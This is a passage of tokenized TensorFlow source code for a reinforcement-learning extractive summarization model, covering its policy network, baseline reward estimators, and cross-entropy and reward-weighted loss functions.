cross entropy training of JP's model. Returns: Outputs of sentence extractor and logits without softmax """<with_stmt>tf.variable_scope('PolicyNetwork')<as>scope### Full Word embedding Lookup Variable # PADDING embedding non-trainable <block_start>pad_embed_variable=variable_on_cpu("pad_embed" [1 FLAGS.wordembed_size] tf.constant_initializer(0) trainable=<false>)<line_sep># UNK embedding trainable unk_embed_variable=variable_on_cpu("unk_embed" [1 FLAGS.wordembed_size] tf.constant_initializer(0) trainable=<true>)<line_sep># Get fullvocab_embed_variable fullvocab_embed_variable=tf.concat(0 [pad_embed_variable unk_embed_variable vocab_embed_variable])<line_sep># print(fullvocab_embed_variable) ### Lookup layer <with_stmt>tf.variable_scope('Lookup')<as>scope<block_start>document_placeholder_flat=tf.reshape(document_placeholder [-1])<line_sep>document_word_embedding=tf.nn.embedding_lookup(fullvocab_embed_variable document_placeholder_flat name="Lookup")<line_sep>document_word_embedding=tf.reshape(document_word_embedding [-1 (FLAGS.max_doc_length+FLAGS.max_title_length+FLAGS.max_image_length) FLAGS.max_sent_length FLAGS.wordembed_size])<line_sep># print(document_word_embedding) <block_end>### Convolution Layer <with_stmt>tf.variable_scope('ConvLayer')<as>scope<block_start>document_word_embedding=tf.reshape(document_word_embedding [-1 FLAGS.max_sent_length FLAGS.wordembed_size])<line_sep>document_sent_embedding=conv1d_layer_sentence_representation(document_word_embedding)# [None, sentembed_size] document_sent_embedding=tf.reshape(document_sent_embedding [-1 (FLAGS.max_doc_length+FLAGS.max_title_length+FLAGS.max_image_length) FLAGS.sentembed_size])<line_sep># print(document_sent_embedding) <block_end>### Reshape Tensor to List [-1, (max_doc_length+max_title_length+max_image_length), sentembed_size] -> List of [-1, sentembed_size] <with_stmt>variable_scope.variable_scope("ReshapeDoc_TensorToList")<block_start>document_sent_embedding=reshape_tensor2list(document_sent_embedding (FLAGS.max_doc_length+FLAGS.max_title_length+FLAGS.max_image_length) FLAGS.sentembed_size)<line_sep># print(document_sent_embedding) <block_end># document_sents_enc document_sents_enc=document_sent_embedding[:FLAGS.max_doc_length]<if_stmt>FLAGS.doc_encoder_reverse<block_start>document_sents_enc=document_sents_enc[::-1]<block_end># document_sents_ext document_sents_ext=document_sent_embedding[:FLAGS.max_doc_length]<line_sep># document_sents_titimg document_sents_titimg=document_sent_embedding[FLAGS.max_doc_length:]<line_sep>### Document Encoder <with_stmt>tf.variable_scope('DocEnc')<as>scope<block_start>encoder_outputs,encoder_state=simple_rnn(document_sents_enc)<block_end>### Sentence Label Extractor <with_stmt>tf.variable_scope('SentExt')<as>scope<block_start><if_stmt>(FLAGS.attend_encoder)<and>(len(document_sents_titimg)<ne>0)# Multiple decoder <block_start>print("Multiple decoder is not implement yet.")<line_sep>exit(0)<line_sep># # Decoder to attend captions # attendtitimg_extractor_output, _ = simple_attentional_rnn(document_sents_ext, document_sents_titimg, initial_state=encoder_state) # # Attend previous decoder # logits = sentence_extractor_seqrnn_docatt(document_sents_ext, attendtitimg_extractor_output, encoder_state, label_placeholder) <block_end><elif_stmt>(<not>FLAGS.attend_encoder)<and>(len(document_sents_titimg)<ne>0)# Attend only titimages during decoding <block_start>extractor_output,logits=sentence_extractor_nonseqrnn_titimgatt(document_sents_ext encoder_state document_sents_titimg)<block_end><elif_stmt>(FLAGS.attend_encoder)<and>(len(document_sents_titimg)<eq>0)# JP model: attend encoder <block_start>extractor_outputs,logits=sentence_extractor_seqrnn_docatt(document_sents_ext encoder_outputs encoder_state label_placeholder)<block_end><else_stmt># Attend nothing <block_start>extractor_output,logits=sentence_extractor_nonseqrnn_noatt(document_sents_ext encoder_state)<block_end><block_end><block_end># print(extractor_output) # print(logits) <return>extractor_output logits<block_end><def_stmt>baseline_future_reward_estimator extractor_output<block_start>"""Implements linear regression to estimate future rewards Args: extractor_output: [FLAGS.batch_size, FLAGS.max_doc_length, FLAGS.size or 2*FLAGS.size] Output: rewards: [FLAGS.batch_size, FLAGS.max_doc_length] """<with_stmt>tf.variable_scope('FutureRewardEstimator')<as>scope<block_start>last_size=extractor_output.get_shape()[2].value<line_sep># Define Variables weight=variable_on_cpu('weight' [last_size 1] tf.random_normal_initializer())<line_sep>bias=variable_on_cpu('bias' [1] tf.random_normal_initializer())<line_sep>extractor_output_forreward=tf.reshape(extractor_output [-1 last_size])<line_sep>future_rewards=tf.matmul(extractor_output_forreward weight)+bias<line_sep># future_rewards: [FLAGS.batch_size, FLAGS.max_doc_length, 1] future_rewards=tf.reshape(future_rewards [-1 FLAGS.max_doc_length 1])<line_sep>future_rewards=tf.squeeze(future_rewards)<block_end><return>future_rewards<block_end><def_stmt>baseline_single_future_reward_estimator extractor_output<block_start>"""Implements linear regression to estimate future rewards for whole document Args: extractor_output: [FLAGS.batch_size, FLAGS.max_doc_length, FLAGS.size or 2*FLAGS.size] Output: rewards: [FLAGS.batch_size] """<with_stmt>tf.variable_scope('FutureRewardEstimator')<as>scope<block_start>last_size=extractor_output.get_shape()[2].value<line_sep># Define Variables weight=variable_on_cpu('weight' [FLAGS.max_doc_length<times>last_size 1] tf.random_normal_initializer())<line_sep>bias=variable_on_cpu('bias' [1] tf.random_normal_initializer())<line_sep>extractor_output_forreward=tf.reshape(extractor_output [-1 FLAGS.max_doc_length<times>last_size])# [FLAGS.batch_size, FLAGS.max_doc_length*(FLAGS.size or 2*FLAGS.size)] future_rewards=tf.matmul(extractor_output_forreward weight)+bias# [FLAGS.batch_size, 1] # future_rewards: [FLAGS.batch_size, 1] future_rewards=tf.squeeze(future_rewards)# [FLAGS.batch_size] <block_end><return>future_rewards<block_end>### Loss Functions <def_stmt>mean_square_loss_doclevel future_rewards actual_reward<block_start>"""Implements mean_square_loss for futute reward prediction args: future_rewards: [FLAGS.batch_size] actual_reward: [FLAGS.batch_size] Output Float Value """<with_stmt>tf.variable_scope('MeanSquareLoss')<as>scope<block_start>sq_loss=tf.square(future_rewards-actual_reward)# [FLAGS.batch_size] mean_sq_loss=tf.reduce_mean(sq_loss)<line_sep>tf.add_to_collection('mean_square_loss' mean_sq_loss)<block_end><return>mean_sq_loss<block_end><def_stmt>mean_square_loss future_rewards actual_reward weights<block_start>"""Implements mean_square_loss for futute reward prediction args: future_rewards: [FLAGS.batch_size, FLAGS.max_doc_length] actual_reward: [FLAGS.batch_size] weights: Weights to avoid padded part [FLAGS.batch_size, FLAGS.max_doc_length] Output Float Value """<with_stmt>tf.variable_scope('MeanSquareLoss')<as>scope<block_start>actual_reward=tf.expand_dims(actual_reward 1)# [FLAGS.batch_size, 1] sq_loss=tf.square(future_rewards-actual_reward)# [FLAGS.batch_size, FLAGS.max_doc_length] mean_sq_loss=0<if_stmt>FLAGS.weighted_loss<block_start>sq_loss=tf.mul(sq_loss weights)<line_sep>sq_loss_sum=tf.reduce_sum(sq_loss)<line_sep>valid_sentences=tf.reduce_sum(weights)<line_sep>mean_sq_loss=sq_loss_sum/valid_sentences<block_end><else_stmt><block_start>mean_sq_loss=tf.reduce_mean(sq_loss)<block_end>tf.add_to_collection('mean_square_loss' mean_sq_loss)<block_end><return>mean_sq_loss<block_end><def_stmt>cross_entropy_loss logits labels weights<block_start>"""Estimate cost of predictions Add summary for "cost" and "cost/avg". Args: logits: Logits from inference(). [FLAGS.batch_size, FLAGS.max_doc_length, FLAGS.target_label_size] labels: Sentence extraction gold levels [FLAGS.batch_size, FLAGS.max_doc_length, FLAGS.target_label_size] weights: Weights to avoid padded part [FLAGS.batch_size, FLAGS.max_doc_length] Returns: Cross-entropy Cost """<with_stmt>tf.variable_scope('CrossEntropyLoss')<as>scope# Reshape logits and labels to match the requirement of softmax_cross_entropy_with_logits <block_start>logits=tf.reshape(logits [-1 FLAGS.target_label_size])# [FLAGS.batch_size*FLAGS.max_doc_length, FLAGS.target_label_size] labels=tf.reshape(labels [-1 FLAGS.target_label_size])# [FLAGS.batch_size*FLAGS.max_doc_length, FLAGS.target_label_size] cross_entropy=tf.nn.softmax_cross_entropy_with_logits(logits labels)# [FLAGS.batch_size*FLAGS.max_doc_length] cross_entropy=tf.reshape(cross_entropy [-1 FLAGS.max_doc_length])# [FLAGS.batch_size, FLAGS.max_doc_length] <if_stmt>FLAGS.weighted_loss<block_start>cross_entropy=tf.mul(cross_entropy weights)<block_end># Cross entroy / document cross_entropy=tf.reduce_sum(cross_entropy reduction_indices=1)# [FLAGS.batch_size] cross_entropy_mean=tf.reduce_mean(cross_entropy name='crossentropy')<line_sep># ## Cross entroy / sentence # cross_entropy_sum = tf.reduce_sum(cross_entropy) # valid_sentences = tf.reduce_sum(weights) # cross_entropy_mean = cross_entropy_sum / valid_sentences # cross_entropy = -tf.reduce_sum(labels * tf.log(logits), reduction_indices=1) # cross_entropy_mean = tf.reduce_mean(cross_entropy, name='crossentropy') tf.add_to_collection('cross_entropy_loss' cross_entropy_mean)<line_sep># # # The total loss is defined as the cross entropy loss plus all of # # # the weight decay terms (L2 loss). # # return tf.add_n(tf.get_collection('losses'), name='total_loss') <block_end><return>cross_entropy_mean<block_end><def_stmt>predict_labels logits<block_start>""" Predict self labels logits: Logits from inference(). [FLAGS.batch_size, FLAGS.max_doc_length, FLAGS.target_label_size] Return [FLAGS.batch_size, FLAGS.max_doc_length, FLAGS.target_label_size] """<with_stmt>tf.variable_scope('PredictLabels')<as>scope# Reshape logits for argmax and argmin <block_start>logits=tf.reshape(logits [-1 FLAGS.target_label_size])# [FLAGS.batch_size*FLAGS.max_doc_length, FLAGS.target_label_size] # Get labels predicted using these logits logits_argmax=tf.argmax(logits 1)# [FLAGS.batch_size*FLAGS.max_doc_length] logits_argmax=tf.reshape(logits_argmax [-1 FLAGS.max_doc_length])# [FLAGS.batch_size, FLAGS.max_doc_length] logits_argmax=tf.expand_dims(logits_argmax 2)# [FLAGS.batch_size, FLAGS.max_doc_length, 1] logits_argmin=tf.argmin(logits 1)# [FLAGS.batch_size*FLAGS.max_doc_length] logits_argmin=tf.reshape(logits_argmin [-1 FLAGS.max_doc_length])# [FLAGS.batch_size, FLAGS.max_doc_length] logits_argmin=tf.expand_dims(logits_argmin 2)# [FLAGS.batch_size, FLAGS.max_doc_length, 1] # Convert argmin and argmax to labels, works only if FLAGS.target_label_size = 2 labels=tf.concat(2 [logits_argmin logits_argmax])# [FLAGS.batch_size, FLAGS.max_doc_length, FLAGS.target_label_size] dtype=tf.float16<if>FLAGS.use_fp16<else>tf.float32<line_sep>labels=tf.cast(labels dtype)<line_sep><return>labels<block_end><block_end><def_stmt>estimate_ltheta_ot logits labels future_rewards actual_rewards weights<block_start>""" Args: logits: Logits from inference(). [FLAGS.batch_size, FLAGS.max_doc_length, FLAGS.target_label_size] labels: Label placeholdr for self prediction [FLAGS.batch_size, FLAGS.max_doc_length, FLAGS.target_label_size] future_rewards: [FLAGS.batch_size, FLAGS.max_doc_length] actual_reward: [FLAGS.batch_size] weights: Weights to avoid padded part [FLAGS.batch_size, FLAGS.max_doc_length] Returns: [FLAGS.batch_size, FLAGS.max_doc_length, FLAGS.target_label_size] """<with_stmt>tf.variable_scope('LTheta_Ot')<as>scope# Get Reward Weights: External reward - Predicted reward <block_start>actual_rewards=tf.tile(actual_rewards [FLAGS.max_doc_length])# [FLAGS.batch_size * FLAGS.max_doc_length] , [a,b] * 3 = [a, b, a, b, a, b] actual_rewards=tf.reshape(actual_rewards [FLAGS.max_doc_length -1])# [FLAGS.max_doc_length, FLAGS.batch_size], # [[a,b], [a,b], [a,b]] actual_rewards=tf.transpose(actual_rewards)# [FLAGS.batch_size, FLAGS.max_doc_length] # [[a,a,a], [b,b,b]] diff_act_pred=actual_rewards-future_rewards# [FLAGS.batch_size, FLAGS.max_doc_length] diff_act_pred=tf.expand_dims(diff_act_pred 2)# [FLAGS.batch_size, FLAGS.max_doc_length, 1] # Convert (FLAGS.target_label_size = 2) diff_act_pred=tf.concat(2 [diff_act_pred diff_act_pred])# [FLAGS.batch_size, FLAGS.max_doc_length, FLAGS.target_label_size] # Reshape logits and labels to match the requirement of softmax_cross_entropy_with_logits logits=tf.reshape(logits [-1 FLAGS.target_label_size])# [FLAGS.batch_size*FLAGS.max_doc_length, FLAGS.target_label_size] logits=tf.nn.softmax(logits)<line_sep>logits=tf.reshape(logits [-1 FLAGS.max_doc_length FLAGS.target_label_size])# [FLAGS.batch_size, FLAGS.max_doc_length, FLAGS.target_label_size] # Get the difference diff_logits_indicator=logits-labels# [FLAGS.batch_size, FLAGS.max_doc_length, FLAGS.target_label_size] # Multiply with reward d_ltheta_ot=tf.mul(diff_act_pred diff_logits_indicator)# [FLAGS.batch_size, FLAGS.max_doc_length, FLAGS.target_label_size] # Multiply with weight weights=tf.expand_dims(weights 2)# [FLAGS.batch_size, FLAGS.max_doc_length, 1] weights=tf.concat(2 [weights weights])# [FLAGS.batch_size, FLAGS.max_doc_length, FLAGS.target_label_size] d_ltheta_ot=tf.mul(d_ltheta_ot weights)# [FLAGS.batch_size, FLAGS.max_doc_length, FLAGS.target_label_size] <return>d_ltheta_ot<block_end><block_end># def estimate_ltheta_ot_mixer(logits, labels_gold, labels_pred, future_rewards, actual_rewards, weights, annealing_step): # """ # Args: # logits: Logits from inference(). [FLAGS.batch_size, FLAGS.max_doc_length, FLAGS.target_label_size] # labels_gold: Label placeholdr for gold labels [FLAGS.batch_size, FLAGS.max_doc_length, FLAGS.target_label_size] # labels_pred: Label placeholdr for self prediction [FLAGS.batch_size, FLAGS.max_doc_length, FLAGS.target_label_size] # future_rewards: [FLAGS.batch_size, FLAGS.max_doc_length] # actual_reward: [FLAGS.batch_size] # weights: Weights to avoid padded part [FLAGS.batch_size, FLAGS.max_doc_length] # annealing_step: [1], single value but in tensor form # Returns: # [FLAGS.batch_size, FLAGS.max_doc_length, FLAGS.target_label_size] # """ # with tf.variable_scope('LTheta_Ot_Mixer') as scope: # print(annealing_step) # policygradloss_length = tf.reduce_sum(annealing_step) * FLAGS.annealing_step_delta # crossentryloss_length = FLAGS.max_doc_length - policygradloss_length # # Reshape logits and partition # logits = tf.reshape(logits, [-1, FLAGS.target_label_size]) # [FLAGS.batch_size*FLAGS.max_doc_length, FLAGS.target_label_size] # logits = tf.nn.softmax(logits) # logits = tf.reshape(logits, [-1, FLAGS.max_doc_length, FLAGS.target_label_size]) # [FLAGS.batch_size, FLAGS.max_doc_length, FLAGS.target_label_size] # logits_list = reshape_tensor2list(logits, FLAGS.max_doc_length, FLAGS.target_label_size) # logits_ce_gold_list = logits_list[0:crossentryloss_length] # logits_ce_gold = reshape_list2tensor(logits_ce_gold_list, crossentryloss_length, FLAGS.target_label_size) # [FLAGS.batch_size, crossentryloss_length, FLAGS.target_label_size] # logits_reward_list = logits_list[crossentryloss_length:] # logits_reward = reshape_list2tensor(logits_reward_list, policygradloss_length, FLAGS.target_label_size) # [FLAGS.batch_size, policygradloss_length, FLAGS.target_label_size] # # Crossentropy loss with gold labels: partition gold_labels # labels_gold_list = reshape_tensor2list(labels_gold, FLAGS.max_doc_length, FLAGS.target_label_size) # labels_gold_used_list = labels_gold_list[0:crossentryloss_length] # labels_gold_used = reshape_list2tensor(labels_gold_used_list, crossentryloss_length, FLAGS.target_label_size) # [FLAGS.batch_size, crossentryloss_length, FLAGS.target_label_size] # # d_ltheta_ot : cross entropy # diff_logits_goldlabels = logits_ce_gold - labels_gold_used # [FLAGS.batch_size, crossentryloss_length, FLAGS.target_label_size] # # Policy gradient for rest # # Get Reward Weights: External reward - Predicted reward # actual_rewards = tf.tile(actual_rewards, [FLAGS.max_doc_length]) # [FLAGS.batch_size * FLAGS.max_doc_length] , [a,b] * 3 = [a, b, a, b, a, b] # actual_rewards = tf.reshape(actual_rewards, [FLAGS.max_doc_length, -1]) # [FLAGS.max_doc_length, FLAGS.batch_size], # [[a,b], [a,b], [a,b]] # actual_rewards = tf.transpose(actual_rewards) # [FLAGS.batch_size, FLAGS.max_doc_length] # [[a,a,a], [b,b,b]] # diff_act_pred = actual_rewards - future_rewards # [FLAGS.batch_size, FLAGS.max_doc_length] # diff_act_pred = tf.expand_dims(diff_act_pred, 2) # [FLAGS.batch_size, FLAGS.max_doc_length, 1] # # Convert (FLAGS.target_label_size = 2) # diff_act_pred = tf.concat(2, [diff_act_pred, diff_act_pred]) # [FLAGS.batch_size, FLAGS.max_doc_length, FLAGS.target_label_size] # # Get used reward diff # diff_act_pred_list = reshape_tensor2list(diff_act_pred, FLAGS.max_doc_length, FLAGS.target_label_size) # diff_reward_act_pred_used_list = diff_act_pred_list[crossentryloss_length:] # diff_reward_act_pred_used = reshape_list2tensor(diff_reward_act_pred_used_list, policygradloss_length, FLAGS.target_label_size) # [FLAGS.batch_size, policygradloss_length, FLAGS.target_label_size] # # Partition predicted labels # labels_pred_list = reshape_tensor2list(labels_pred, FLAGS.max_doc_length, FLAGS.target_label_size) # labels_pred_used_list = labels_pred_list[crossentryloss_length:] # labels_pred_used = reshape_list2tensor(labels_pred_used_list, policygradloss_length, FLAGS.target_label_size) # [FLAGS.batch_size, policygradloss_length, FLAGS.target_label_size] # # d_ltheta_ot : reward weighted # diff_logits_predlabels = logits_reward - labels_pred_used # [FLAGS.batch_size, policygradloss_length, FLAGS.target_label_size] # # Multiply with reward # reward_weighted_diff_logits_predlabels = tf.mul(diff_reward_act_pred_used, diff_logits_predlabels) # [FLAGS.batch_size, policygradloss_length, FLAGS.target_label_size] # # Concat both part # d_ltheta_ot_mixer = tf.concat(1, [diff_logits_goldlabels, reward_weighted_diff_logits_predlabels]) # [FLAGS.batch_size, FLAGS.max_doc_length, FLAGS.target_label_size] # # Multiply with weight # weights = tf.expand_dims(weights, 2) # [FLAGS.batch_size, FLAGS.max_doc_length, 1] # weights = tf.concat(2, [weights, weights]) # [FLAGS.batch_size, FLAGS.max_doc_length, FLAGS.target_label_size] # d_ltheta_ot_mixer = tf.mul(d_ltheta_ot_mixer, weights) # [FLAGS.batch_size, FLAGS.max_doc_length, FLAGS.target_label_size] # return d_ltheta_ot_mixer <def_stmt>reward_weighted_cross_entropy_loss_multisample logits labels actual_rewards weights<block_start>"""Estimate cost of predictions Add summary for "cost" and "cost/avg". Args: logits: Logits from inference(). [FLAGS.batch_size, FLAGS.max_doc_length, FLAGS.target_label_size] labels: Label placeholdr for multiple sampled prediction [FLAGS.batch_size, 1, FLAGS.max_doc_length, FLAGS.target_label_size] actual_rewards: [FLAGS.batch_size, 1] weights: Weights to avoid padded part [FLAGS.batch_size, FLAGS.max_doc_length] Returns: Cross-entropy Cost """<with_stmt>tf.variable_scope('RWCELossMultiSample')<as>scope# Expand logits and weights for roll outs <block_start>logits_temp=tf.expand_dims(logits 1)# [FLAGS.batch_size, 1, FLAGS.max_doc_length, FLAGS.target_label_size] weights_temp=tf.expand_dims(weights 1)# [FLAGS.batch_size, 1, FLAGS.max_doc_length] logits_expanded=logits_temp<line_sep>weights_expanded=weights_temp<line_sep># for ridx in range(1,FLAGS.num_sample_rollout): # logits_expanded = tf.concat(1, [logits_expanded, logits_temp]) # [FLAGS.batch_size, n++, FLAGS.max_doc_length, FLAGS.target_label_size] # weights_expanded = tf.concat(1, [weights_expanded, weights_temp]) # [FLAGS.batch_size, n++, FLAGS.max_doc_length] # Reshape logits and labels to match the requirement of softmax_cross_entropy_with_logits logits_expanded=tf.reshape(logits_expanded [-1 FLAGS.target_label_size])# [FLAGS.batch_size*1*FLAGS.max_doc_length, FLAGS.target_label_size] labels=tf.reshape(labels [-1 FLAGS.target_label_size])# [FLAGS.batch_size*1*FLAGS.max_doc_length, FLAGS.target_label_size] cross_entropy=tf.nn.softmax_cross_entropy_with_logits(logits_expanded labels)# [FLAGS.batch_size*1*FLAGS.max_doc_length] cross_entropy=tf.reshape(cross_entropy [-1 1 FLAGS.max_doc_length])# [FLAGS.batch_size, 1, FLAGS.max_doc_length] <if_stmt>FLAGS.weighted_loss<block_start>cross_entropy=tf.mul(cross_entropy weights_expanded)<block_end># [FLAGS.batch_size, 1, FLAGS.max_doc_length] # Reshape actual rewards actual_rewards=tf.reshape(actual_rewards [-1])# [FLAGS.batch_size*1] # [[a, b], [c, d], [e, f]] 3x2 => [a, b, c, d, e, f] [6] actual_rewards=tf.tile(actual_rewards [FLAGS.max_doc_length])# [FLAGS.batch_size * 1 * FLAGS.max_doc_length] # [a, b, c, d, e, f] * 2 = [a, b, c, d, e, f, a, b, c, d, e, f] [12] actual_rewards=tf.reshape(actual_rewards [FLAGS.max_doc_length -1])# [FLAGS.max_doc_length, FLAGS.batch_size*1] # [[a, b, c, d, e, f], [a, b, c, d, e, f]] [2, 6] actual_rewards=tf.transpose(actual_rewards)# [FLAGS.batch_size*1, FLAGS.max_doc_length] # [[a,a], [b,b], [c,c], [d,d], [e,e], [f,f]] [6 x 2] actual_rewards=tf.reshape(actual_rewards [-1 1 FLAGS.max_doc_length])# [FLAGS.batch_size, 1, FLAGS.max_doc_length], # [[[a,a], [b,b]], [[c,c], [d,d]], [[e,e], [f,f]]] [3 x 2 x 2] # Multiply with reward reward_weighted_cross_entropy=tf.mul(cross_entropy actual_rewards)# [FLAGS.batch_size, 1, FLAGS.max_doc_length] # Cross entroy / sample / document reward_weighted_cross_entropy=tf.reduce_sum(reward_weighted_cross_entropy reduction_indices=2)# [FLAGS.batch_size, 1] reward_weighted_cross_entropy_mean=tf.reduce_mean(reward_weighted_cross_entropy name='rewardweightedcemultisample')<line_sep>tf.add_to_collection('reward_cross_entropy_loss_multisample' reward_weighted_cross_entropy_mean)<line_sep><return>reward_weighted_cross_entropy_mean<block_end><block_end><def_stmt>reward_weighted_cross_entropy_loss logits labels actual_rewards weights<block_start>"""Estimate cost of predictions Add summary for "cost" and "cost/avg". Args: logits: Logits from inference(). [FLAGS.batch_size, FLAGS.max_doc_length, FLAGS.target_label_size] labels: Label placeholdr for self prediction [FLAGS.batch_size, FLAGS.max_doc_length, FLAGS.target_label_size] actual_reward: [FLAGS.batch_size] weights: Weights to avoid padded part [FLAGS.batch_size, FLAGS.max_doc_length] Returns: Cross-entropy Cost """<with_stmt>tf.variable_scope('RewardWeightedCrossEntropyLoss')<as>scope# Reshape logits and labels to match the requirement of softmax_cross_entropy_with_logits <block_start>logits=tf.reshape(logits [-1 FLAGS.target_label_size])# [FLAGS.batch_size*FLAGS.max_doc_length, FLAGS.target_label_size] labels=tf.reshape(labels [-1 FLAGS.target_label_size])# [FLAGS.batch_size*FLAGS.max_doc_length, FLAGS.target_label_size] cross_entropy=tf.nn.softmax_cross_entropy_with_logits(logits labels)# [FLAGS.batch_size*FLAGS.max_doc_length] cross_entropy=tf.reshape(cross_entropy [-1 FLAGS.max_doc_length])# [FLAGS.batch_size, FLAGS.max_doc_length] <if_stmt>FLAGS.weighted_loss<block_start>cross_entropy=tf.mul(cross_entropy weights)<block_end># [FLAGS.batch_size, FLAGS.max_doc_length] # Reshape actual rewards actual_rewards=tf.tile(actual_rewards [FLAGS.max_doc_length])# [FLAGS.batch_size * FLAGS.max_doc_length] , [a,b] * 3 = [a, b, a, b, a, b] actual_rewards=tf.reshape(actual_rewards [FLAGS.max_doc_length -1])# [FLAGS.max_doc_length, FLAGS.batch_size], # [[a,b], [a,b], [a,b]] actual_rewards=tf.transpose(actual_rewards)# [FLAGS.batch_size, FLAGS.max_doc_length] # [[a,a,a], [b,b,b]] # Multiply with reward reward_weighted_cross_entropy=tf.mul(cross_entropy actual_rewards)# [FLAGS.batch_size, FLAGS.max_doc_length] # Cross entroy / document reward_weighted_cross_entropy=tf.reduce_sum(reward_weighted_cross_entropy reduction_indices=1)# [FLAGS.batch_size] reward_weighted_cross_entropy_mean=tf.reduce_mean(reward_weighted_cross_entropy name='rewardweightedcrossentropy')<line_sep>tf.add_to_collection('reward_cross_entropy_loss' reward_weighted_cross_entropy_mean)<line_sep><return>reward_weighted_cross_entropy_mean<block_end><block_end># def reward_weighted_cross_entropy_loss(logits, labels, future_rewards, actual_rewards, weights): # """Estimate cost of predictions # Add summary for "cost" and "cost/avg". # Args: # logits: Logits from inference(). [FLAGS.batch_size, FLAGS.max_doc_length, FLAGS.target_label_size] # labels: Label placeholdr for self prediction [FLAGS.batch_size, FLAGS.max_doc_length, FLAGS.target_label_size] # future_rewards: [FLAGS.batch_size, FLAGS.max_doc_length] # actual_reward: [FLAGS.batch_size] # weights: Weights to avoid padded part [FLAGS.batch_size, FLAGS.max_doc_length] # Returns: # Cross-entropy Cost # """ # with tf.variable_scope('RewardWeightedCrossEntropyLoss') as scope: # # Get Reward Weights: External reward - Predicted reward # actual_rewards = tf.tile(actual_rewards, [FLAGS.max_doc_length]) # [FLAGS.batch_size * FLAGS.max_doc_length] , [a,b] * 3 = [a, b, a, b, a, b] # actual_rewards = tf.reshape(actual_rewards, [FLAGS.max_doc_length, -1]) # [FLAGS.max_doc_length, FLAGS.batch_size], # [[a,b], [a,b], [a,b]] # actual_rewards = tf.transpose(actual_rewards) # [FLAGS.batch_size, FLAGS.max_doc_length] # [[a,a,a], [b,b,b]] # # Error: actual_rewards = tf.reshape(tf.tile(actual_rewards, [FLAGS.max_doc_length]),[-1, FLAGS.max_doc_length]) # [FLAGS.batch_size, FLAGS.max_doc_length] # diff_act_pred = future_rewards - actual_rewards # actual_rewards - future_rewards # [FLAGS.batch_size, FLAGS.max_doc_length] # # Reshape logits and labels to match the requirement of softmax_cross_entropy_with_logits # logits = tf.reshape(logits, [-1, FLAGS.target_label_size]) # [FLAGS.batch_size*FLAGS.max_doc_length, FLAGS.target_label_size] # labels = tf.reshape(labels, [-1, FLAGS.target_label_size]) # [FLAGS.batch_size*FLAGS.max_doc_length, FLAGS.target_label_size] # cross_entropy = tf.nn.softmax_cross_entropy_with_logits(logits, labels) # [FLAGS.batch_size*FLAGS.max_doc_length] # cross_entropy = tf.reshape(cross_entropy, [-1, FLAGS.max_doc_length]) # [FLAGS.batch_size, FLAGS.max_doc_length] # if FLAGS.weighted_loss: # cross_entropy = tf.mul(cross_entropy, weights) # [FLAGS.batch_size, FLAGS.max_doc_length] # # Multiply with reward # reward_weighted_cross_entropy = tf.mul(cross_entropy, diff_act_pred) # [FLAGS.batch_size, FLAGS.max_doc_length] # # Cross entroy / document # reward_weighted_cross_entropy = tf.reduce_sum(reward_weighted_cross_entropy, reduction_indices=1) # [FLAGS.batch_size] # reward_weighted_cross_entropy_mean = tf.reduce_mean(reward_weighted_cross_entropy, name='rewardweightedcrossentropy') # tf.add_to_collection('reward_cross_entropy_loss', reward_weighted_cross_entropy_mean) # return reward_weighted_cross_entropy_mean # def temp_reward_weighted_cross_entropy_loss(logits, labels, future_rewards, actual_rewards, weights): # """Estimate cost of predictions # Add summary for "cost" and "cost/avg". # Args: # logits: Logits from inference(). [FLAGS.batch_size, FLAGS.max_doc_length, FLAGS.target_label_size] # labels: Label placeholdr for self prediction [FLAGS.batch_size, FLAGS.max_doc_length, FLAGS.target_label_size] # future_rewards: [FLAGS.batch_size, FLAGS.max_doc_length] # actual_reward: [FLAGS.batch_size] # weights: Weights to avoid padded part [FLAGS.batch_size, FLAGS.max_doc_length] # Returns: # Cross-entropy Cost # """ # with tf.variable_scope('TempRewardWeightedCrossEntropyLoss') as scope: # # Get Reward Weights: External reward - Predicted reward # actual_rewards = tf.tile(actual_rewards, [FLAGS.max_doc_length]) # [FLAGS.batch_size * FLAGS.max_doc_length] , [a,b] * 3 = [a, b, a, b, a, b] # actual_rewards = tf.reshape(actual_rewards, [FLAGS.max_doc_length, -1]) # [FLAGS.max_doc_length, FLAGS.batch_size], # [[a,b], [a,b], [a,b]] # actual_rewards = tf.transpose(actual_rewards) # [FLAGS.batch_size, FLAGS.max_doc_length] # [[a,a,a], [b,b,b]] # diff_act_pred = future_rewards - actual_rewards # actual_rewards - future_rewards # [FLAGS.batch_size, FLAGS.max_doc_length] # # Reshape logits and labels to match the requirement of softmax_cross_entropy_with_logits # logits = tf.reshape(logits, [-1, FLAGS.target_label_size]) # [FLAGS.batch_size*FLAGS.max_doc_length, FLAGS.target_label_size] # labels = tf.reshape(labels, [-1, FLAGS.target_label_size]) # [FLAGS.batch_size*FLAGS.max_doc_length, FLAGS.target_label_size] # cross_entropy = tf.nn.softmax_cross_entropy_with_logits(logits, labels) # [FLAGS.batch_size*FLAGS.max_doc_length] # cross_entropy = tf.reshape(cross_entropy, [-1, FLAGS.max_doc_length]) # [FLAGS.batch_size, FLAGS.max_doc_length] # if FLAGS.weighted_loss: # cross_entropy = tf.mul(cross_entropy, weights) # [FLAGS.batch_size, FLAGS.max_doc_length] # # Multiply with reward # reward_weighted_cross_entropy = tf.mul(cross_entropy, diff_act_pred) # [FLAGS.batch_size, FLAGS.max_doc_length] # # Cross entroy / document # reward_weighted_cross_entropy = tf.reduce_sum(reward_weighted_cross_entropy, reduction_indices=1) # [FLAGS.batch_size] # reward_weighted_cross_entropy_mean = tf.reduce_mean(reward_weighted_cross_entropy, name='rewardweightedcrossentropy') # optimizer = tf.train.AdamOptimizer(learning_rate=FLAGS.learning_rate, name='adam') # # Compute gradients of policy network # policy_network_variables = tf.get_collection(tf.GraphKeys.TRAINABLE_VARIABLES, scope="PolicyNetwork") # # print(policy_network_variables) # # Compute gradients of policy network # grads_and_vars = optimizer.compute_gradients(reward_weighted_cross_entropy_mean, var_list=policy_network_variables) # # print(grads_and_vars) # return actual_rewards, cross_entropy, diff_act_pred, reward_weighted_cross_entropy, reward_weighted_cross_entropy_mean, grads_and_vars # def cross_entropy_loss_selfprediction(logits, weights): # """Optimizing expected reward: Weighted cross entropy # args: # logits: Logits without softmax. [FLAGS.batch_size, FLAGS.max_doc_length, FLAGS.target_label_size] # weights: Weights to avoid padded part [FLAGS.batch_size, FLAGS.max_doc_length] # return: # [FLAGS.batch_size, FLAGS.max_doc_length] # """ # with tf.variable_scope('SelfPredCrossEntropyLoss') as scope: # # Reshape logits for argmax and argmin # logits = 